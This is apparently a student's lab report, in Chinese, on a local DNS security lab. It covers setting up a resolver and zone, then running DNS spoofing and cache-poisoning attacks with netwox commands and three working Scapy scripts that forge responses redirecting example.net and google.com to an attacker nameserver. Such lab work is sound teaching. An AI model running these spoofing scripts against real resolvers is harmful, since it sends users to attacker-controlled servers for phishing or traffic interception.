Task 1: Configure the User Machine
该部分配置用户使用本地dns服务器,除了pdf上修改/etc/resolvconf/resolv.conf.d/head,在每次开启虚拟机时,还要检查/etc/resolv.conf文件,将nameserver 127.0.1.1以及有时候会出现的fudan.edu.cn注释,保证只有一条nameserver指向本地服务器 :
用wireshark可以清晰的看出向本地服务器发出的dns请求:
Task 2: Set up a Local DNS Server
下图为按照教程配置
在配置好本地服务器后,用户机器就可以通过本地dns服务器来进行域名解析了
Task 3: Host a Zone in the Local DNS Server
将提供的两个文件放在目录下,再重启dns服务器即可
由于加入了zone,www.example.com会被解析到192.168.0.101
Lab Tasks (Part II): Attacks on DNS
Task4:
用root权限打开/etc/hosts. 添加上www.bank32.com我们所希望其被解析的ip即可
现可以把www.bank32.com解析到任意的ip地址:
在这里解析到127.0.0.1和10.0.2.15作为示例:
Task 5: Directly Spoofing Response to User
运行攻击程序之前
运行攻击程序之后
#攻击程序
netwox 105 --hostname "www.example.net" --hostnameip "1.2.3.4" --authns "ns.example.com" --authnsip "1.2.3.5"
根据pdf的提示以及network 105 --help可以轻松的构造出以上命令,其中–hostnameip "1.2.3.4"是将"www.example.net"映射到该地址,–authnsip "1.2.3.5"是指"ns.example.net"这个dns服务器在该ip地址
Task 6: DNS Cache Poisoning Attack
sudo netwox 105 --hostname "www.example.net" --hostnameip "10.20.30.40" --authns "ns.example.net" --authnsip "10.20.30.50" --ttl 19000 --spoofip raw
同上,根据pdf的提示以及network 105 --help可以轻松的构造出以上命令,其中–hostnameip "10.20.30.40"是将"www.example.net"映射到该地址,–authnsip "10.20.30.50"是指"ns.example.net"这个dns服务器在该ip地址,由上图可以看到cache文件夹已经含有我们期望的信息
Task 7: DNS Cache Poisoning: Targeting the Authority Section
下图是执行 sudo vim /var/cache/bind/dump.db后,查看dns缓存,发现的确成功缓存进。
由下图的wireshark可以看出,example.net的域名下所有网站都会被解析到199.43.133.53(attacker32.com)的dns服务器
#该task的程序如下
#!/usr/bin/python
from scapy.all import *
def spoof_dns(pkt):
if (DNS in pkt and 'www.example.net' in pkt[DNS].qd.qname):
# Swap the source and destination IP address
IPpkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)
# Swap the source and destination port number
UDPpkt = UDP(dport=pkt[UDP].sport, sport=53)
# The Answer Section
Anssec = DNSRR(rrname=pkt[DNS].qd.qname, type='A',ttl=259200, rdata='10.0.2.123')
# The Authority Section
#构造example.net -> attack32.com的域名到服务器域名映射
NSsec1 = DNSRR(rrname='example.net', type='NS', ttl=259200, rdata='attacker32.com')
# The Additional Section
#构造attacker32.com -> 10.2.3.4的域名到ip的映射
Addsec1 = DNSRR(rrname='attacker32.com', type='A', ttl=259200, rdata='10.2.3.4')
# Construct the DNS packet
DNSpkt = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, rd=0, qr=1,
qdcount=1, ancount=1, nscount=1, arcount=1,
an=Anssec, ns=NSsec1 ,ar=Addsec1)
# Construct the entire IP packet and send it out
spoofpkt = IPpkt/UDPpkt/DNSpkt
send(spoofpkt)
# Sniff UDP query packets and invoke spoof_dns().
pkt = sniff(filter='udp and dst port 53', prn=spoof_dns)
Task 8: Targeting Another Domain
#!/usr/bin/python
from scapy.all import *
def spoof_dns(pkt):
if (DNS in pkt and 'www.example.net' in pkt[DNS].qd.qname):
# Swap the source and destination IP address
IPpkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)
# Swap the source and destination port number
UDPpkt = UDP(dport=pkt[UDP].sport, sport=53)
# The Answer Section
Anssec = DNSRR(rrname=pkt[DNS].qd.qname, type='A',ttl=259200, rdata='10.0.2.123')
# The Authority Section
NSsec1 = DNSRR(rrname='example.net', type='NS', ttl=259200, rdata='attacker32.com')
NSsec2 = DNSRR(rrname='google.com', type='NS', ttl=260000, rdata='attacker32.com') #添加上google->attacker32.com
# The Additional Section
Addsec1 = DNSRR(rrname='attacker32.com', type='A', ttl=259200, rdata='1.2.3.4')
Addsec2 = DNSRR(rrname='attacker32,com', type='A', ttl=259200, rdata='5.6.7.8')
# Construct the DNS packet
DNSpkt = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, rd=0, qr=1,
qdcount=1, ancount=1, nscount=2, arcount=2,
an=Anssec, ns=NSsec1/NSsec2, ar=Addsec1/Addsec2) #ar=Addsec1
# Construct the entire IP packet and send it out
spoofpkt = IPpkt/UDPpkt/DNSpkt
send(spoofpkt)
# Sniff UDP query packets and invoke spoof_dns().
pkt = sniff(filter='udp and dst port 53 ', prn=spoof_dns)
- 在Authority section中,example.net 与 google.com都被映射到attacker32.com,但在本地dns服务器的缓存中,只存储了ns=NSsec1/NSsec2中的NSsec1。当ns=NSsec1/NSsec2时,cache如下:
当ns=NSsec2/NSsec1时,cache如下:
Task 9: Targeting the Additional Section
-
dig返回信息:
在cache中,只有attack32.com->1.2.3.4和ns.example.net->5.6.7.8的缓存,而www.facebook.com ->3.4.5.6的记录不会被缓存,这是由于additional中的记录只有与authority中匹配,dns缓存才会将其收入到dns的缓存中 -
dns缓存:
#!/usr/bin/python
from scapy.all import *
def spoof_dns(pkt):
if (DNS in pkt and 'www.example.net' in pkt[DNS].qd.qname):
# Swap the source and destination IP address
IPpkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)
# Swap the source and destination port number
UDPpkt = UDP(dport=pkt[UDP].sport, sport=53)
# The Answer Section
Anssec = DNSRR(rrname=pkt[DNS].qd.qname, type='A',ttl=259200, rdata='123.123.123.123')
# The Authority Section
NSsec1 = DNSRR(rrname='example.net', type='NS', ttl=259200, rdata='attacker32.com')
NSsec2 = DNSRR(rrname='example.net', type='NS', ttl=259200, rdata='ns.example.net')
# The Additional Section
Addsec1 = DNSRR(rrname='attacker32.com', type='A', ttl=259200, rdata='1.2.3.4')
Addsec2 = DNSRR(rrname='ns.example.net', type='A', ttl=259200, rdata='5.6.7.8')
Addsec3 = DNSRR(rrname='www.facebook.com', type='A', ttl=259200, rdata='3.4.5.6')
# Construct the DNS packet
DNSpkt = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, rd=0, qr=1,
qdcount=1, ancount=1, nscount=2, arcount=3,
an=Anssec, ns=NSsec1/NSsec2, ar=Addsec1/Addsec2/Addsec3) #ar=Addsec1
# Construct the entire IP packet and send it out
spoofpkt = IPpkt/UDPpkt/DNSpkt
send(spoofpkt)
# Sniff UDP query packets and invoke spoof_dns().
pkt = sniff(filter='udp and dst port 53', prn=spoof_dns)